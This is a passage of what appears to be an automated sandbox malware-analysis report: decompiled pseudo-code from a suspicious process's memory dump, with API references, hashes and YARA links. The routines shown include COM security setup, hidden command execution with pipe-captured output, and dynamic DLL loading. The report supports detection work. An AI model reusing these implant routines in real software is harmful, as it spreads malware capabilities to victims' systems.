				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0xe6b840, 0, 1, 0xe6b850, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00E585EA(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x00e5d53b
0x00e5d53e
0x00e5d541
0x00e5d552
0x00e5d558
0x00e5d569
0x00e5d571
0x00e5d5c2
0x00e5d5c2
0x00e5d5c7
0x00e5d5cc
0x00e5d5cc
0x00e5d5cf
0x00e5d5d4
0x00e5d5d9
0x00e5d5d9
0x00e5d5dc
0x00e5d573
0x00e5d574
0x00e5d57a
0x00e5d58b
0x00e5d590
0x00000000
0x00e5d592
0x00e5d59f
0x00e5d5a7
0x00000000
0x00e5d5a9
0x00e5d5ab
0x00e5d5b3
0x00000000
0x00e5d5b5
0x00e5d5b8
0x00e5d5be
0x00e5d5be
0x00e5d5b3
0x00e5d5a7
0x00e5d590
0x00e5d5e1

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D541
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D552
CoCreateInstance.OLE32(00E6B840,00000000,00000001,00E6B850,?,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D569
SysAllocString.OLEAUT32(00000000), ref: 00E5D574
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D59F

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: ca2f94679c2d76f5a3d24b2a82155bac7f8a83d61a222173d4a8c31d292f000b
Instruction ID: edcc136155fe842963b3021332e70aae21a4df26a24b7e3cec1fc4096db98c95
Opcode Fuzzy Hash: ca2f94679c2d76f5a3d24b2a82155bac7f8a83d61a222173d4a8c31d292f000b
Instruction Fuzzy Hash: 08212870701245BFD7289B62DC4DE6BBF7CEFC2B55B00455DB906B72A0DAB09A45CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00E6220A, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E6220A(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L00E622D8();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00E6229C();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0xe68248;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00E6229C();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0xe68250;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x00e6220a
0x00e62212
0x00e62217
0x00e6221a
0x00e6221f
0x00e62225
0x00e6222e
0x00e62232
0x00e62232
0x00e6222e
0x00e62234
0x00e62239
0x00e62242
0x00e62247
0x00e6224a
0x00e62253
0x00e62255
0x00e6225c
0x00e6226d
0x00e6226d
0x00e6226f
0x00e62277
0x00e6227e
0x00000000
0x00e62279
0x00e6227d
0x00e6227d
0x00e6225e
0x00e6225e
0x00e62264
0x00e62266
0x00e6226b
0x00e62281
0x00e62284
0x00e62289
0x00000000
0x00000000
0x00000000
0x00e6226b

APIs

localeconv.MSVCRT ref: 00E62212
strchr.MSVCRT ref: 00E62225
_errno.MSVCRT ref: 00E62234
strtod.MSVCRT ref: 00E62242
_errno.MSVCRT ref: 00E6226F

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: dd875bcd0328107b4425bb32a3bca7abfb9f24598e299fcd3248220e04b36052
Instruction ID: e83fb6d0555c02e21449633aefb0374c1abb0791177c87812fbe8a0d5ac6fbfe
Opcode Fuzzy Hash: dd875bcd0328107b4425bb32a3bca7abfb9f24598e299fcd3248220e04b36052
Instruction Fuzzy Hash: 32012435940905ABDF126F25F9256993BE4AF4A3E4F2052C8EB80761F2CB718858CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E5A99D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00E5A99D(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E00E58600( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0xe6e684; // 0x510f6c8
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0xe6e684; // 0x510f6c8
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00E585EA(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0xe6e684; // 0x510f6c8
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0xe6e684; // 0x510f6c8
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0xe6e684; // 0x510f6c8
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0xe6e684; // 0x510f6c8
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E00E5918C(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00E59278(_t127);
						E00E58600( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E00E5C384(_t127));
				_t98 =  *0xe6e68c; // 0x510f890
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00E5923C(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E00E58600( &_v32, 0);
				return _t128;
			}

0x00e5a9a8
0x00e5a9aa
0x00e5a9b6
0x00e5a9bb
0x00e5a9be
0x00e5a9c0
0x00e5a9c3
0x00e5a9c6
0x00e5a9cd
0x00e5a9d0
0x00e5a9d7
0x00e5a9da
0x00e5a9e4
0x00e5a9e5
0x00e5a9e8
0x00e5a9ea
0x00e5a9eb
0x00e5aa02
0x00e5ab82
0x00000000
0x00e5ab82
0x00e5aa19
0x00e5ab4e
0x00e5ab54
0x00e5ab5f
0x00e5ab61
0x00e5ab69
0x00e5ab69
0x00e5ab70
0x00e5ab72
0x00e5ab7b
0x00e5ab7b
0x00000000
0x00e5ab7e
0x00e5aa1f
0x00e5aa22
0x00e5aa25
0x00e5aa2b
0x00e5aa35
0x00e5aa3f
0x00e5aa46
0x00e5aa4f
0x00e5aa51
0x00e5aa57
0x00000000
0x00000000
0x00e5aa62
0x00e5aa69
0x00e5aa6a
0x00e5aa6f
0x00e5aa70
0x00e5aa71
0x00e5aa76
0x00e5aa78
0x00e5aa79
0x00e5aa7a
0x00e5aa7d
0x00e5aa83
0x00000000
0x00000000
0x00e5aa89
0x00e5aa91
0x00e5aa94
0x00e5aa9c
0x00e5aa9f
0x00e5aaa2
0x00e5aaa8
0x00e5aabc
0x00e5aac2
0x00e5aac8
0x00e5aaf1
0x00e5aaca
0x00e5aaca
0x00e5aacc
0x00e5aace
0x00e5aad6
0x00e5aade
0x00e5aae3
0x00e5aae3
0x00e5aaf7
0x00e5aaf9
0x00e5aaf9
0x00e5ab01
0x00e5ab09
0x00e5ab0a
0x00e5ab0f
0x00e5ab18
0x00e5ab38
0x00e5ab38
0x00e5ab40
0x00e5ab43
0x00e5ab4b
0x00000000
0x00e5ab4b
0x00e5ab21
0x00e5ab25
0x00000000
0x00000000
0x00e5ab2d
0x00000000

APIs

memset.MSVCRT ref: 00E5A9DA
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 00E5A9FE
CreatePipe.KERNEL32(00E5658F,?,0000000C,00000000), ref: 00E5AA15

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646

Strings

D, xrefs: 00E5AA35

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 12cb2d7f546874d3528f201108661d9fef01fbf754f18d5127a8d4f27e38e3f9
Instruction ID: 57b00369fc3b9cbf8c83d024a1f5c5ea51e90e5340e726421224a6662408d8a1
Opcode Fuzzy Hash: 12cb2d7f546874d3528f201108661d9fef01fbf754f18d5127a8d4f27e38e3f9
Instruction Fuzzy Hash: 35515A71D00209AFDB50DFA9DC45ADEB7B9AF08311F144569F500F7291EBB09A098BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E5C4D9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E5C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0xe6e688; // 0xe80000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E00E595C7(_t50, 0xb62);
					_t66 =  *0xe6e688; // 0xe80000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00E59626( &_v140, 0x40, L"%08x", E00E5D40B(_t66 + 0xb0, E00E5C384(_t66 + 0xb0), 0));
					_t20 =  *0xe6e688; // 0xe80000
					asm("sbb eax, eax");
					_t25 = E00E595C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0xe6e688; // 0xe80000
					_t68 = E00E592CB(_t26 + 0x1020);
					_v12 = _t68;
					E00E585BB( &_v8);
					_t32 =  *0xe6e688; // 0xe80000
					_t34 = E00E592CB(_t32 + 0x122a);
					 *0xe6e784 = _t34;
					_t35 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0xe6e784);
					 *0xe6e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E00E5E17C(0xe6bb40, _t60);
					}
					 *0xe6e780 = _t38;
					E00E58600( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0xe6e780 != 0) {
						goto L10;
					} else {
						E00E58600(0xe6e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0xe6e780 == 0) {
						_t46 =  *0xe6e6bc; // 0x510f7f0
						 *0xe6e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x00e5c4d9
0x00e5c4d9
0x00e5c4d9
0x00e5c4dc
0x00e5c4e8
0x00e5c4f3
0x00e5c50f
0x00e5c514
0x00e5c51d
0x00e5c51f
0x00e5c527
0x00e5c548
0x00e5c54d
0x00e5c55a
0x00e5c565
0x00e5c56c
0x00e5c573
0x00e5c584
0x00e5c58a
0x00e5c58d
0x00e5c5a4
0x00e5c5b0
0x00e5c5b8
0x00e5c5bf
0x00e5c5c5
0x00e5c5d1
0x00e5c5d7
0x00e5c5de
0x00e5c5f1
0x00e5c5e0
0x00e5c5e0
0x00e5c5e3
0x00e5c5e9
0x00e5c5ee
0x00e5c5f3
0x00e5c5fe
0x00e5c610
0x00e5c622
0x00000000
0x00e5c624
0x00e5c62b
0x00000000
0x00e5c631
0x00e5c632
0x00e5c632
0x00e5c639
0x00e5c63b
0x00e5c640
0x00e5c640
0x00e5c645
0x00e5c649
0x00e5c649

APIs

LoadLibraryW.KERNEL32 ref: 00E5C5D1
memset.MSVCRT ref: 00E5C610

Strings

%08x, xrefs: 00E5C53A
dll, xrefs: 00E5C593

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 6de24a91994d981111173aa0a772771216bbb2c5b1539c2a00c10577211dea61
Instruction ID: f0e61a3b8f67d3895d3df82ec6ea21bf09c1b95082cce524563c1d2e2678d047
Opcode Fuzzy Hash: 6de24a91994d981111173aa0a772771216bbb2c5b1539c2a00c10577211dea61
Instruction Fuzzy Hash: 4931F371500204AFE7009B69FC45E9B33ECEB547A5F105835F904F72D1EAB4A94C8764

Uniqueness

Uniqueness Score: -1.00%

Function 00E62D80, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00E62D80(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x5fe85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00E65DA0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00E64B00(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x5fe85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00E64C40( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x5fe85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00E64C40(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x5fe85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x5fe85000
							E00E65DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00E64B00( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x5fe85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x00e62d86
0x00e62d8b
0x00e62d8f
0x00e62d92
0x00e62d92
0x00e62d95
0x00e62d9a
0x00e62d9f
0x00e62da2
0x00e62da7
0x00e62daa
0x00e62db0
0x00e62db0
0x00e62dbb
0x00e62dbe
0x00e62dc5
0x00e62dca
0x00000000
0x00000000
0x00e62dd0
0x00e62dd5
0x00e62dd5
0x00e62dda
0x00e62de0
0x00e62dea
0x00e62def
0x00e62df5
0x00e62e14
0x00e62e17
0x00e62e22
0x00e62e22
0x00e62e22
0x00e62e19
0x00e62e19
0x00e62e1b
0x00000000
0x00e62e1d
0x00e62e1d
0x00e62e1d
0x00e62e1b
0x00e62e2a
0x00e62e2f
0x00e62e34
0x00e62e3a
0x00e62e3e
0x00e62e41
0x00e62e44
0x00e62e4a
0x00e62e4f
0x00e62e52
0x00e62e58
0x00e62e5d
0x00e62e63
0x00e62e69
0x00e62e6e
0x00e62e71
0x00e62e76
0x00e62e7a
0x00e62e7e
0x00e62e81
0x00e62e84
0x00e62e8d
0x00e62e94
0x00e62e97
0x00e62e9a
0x00e62e9f
0x00e62ea4
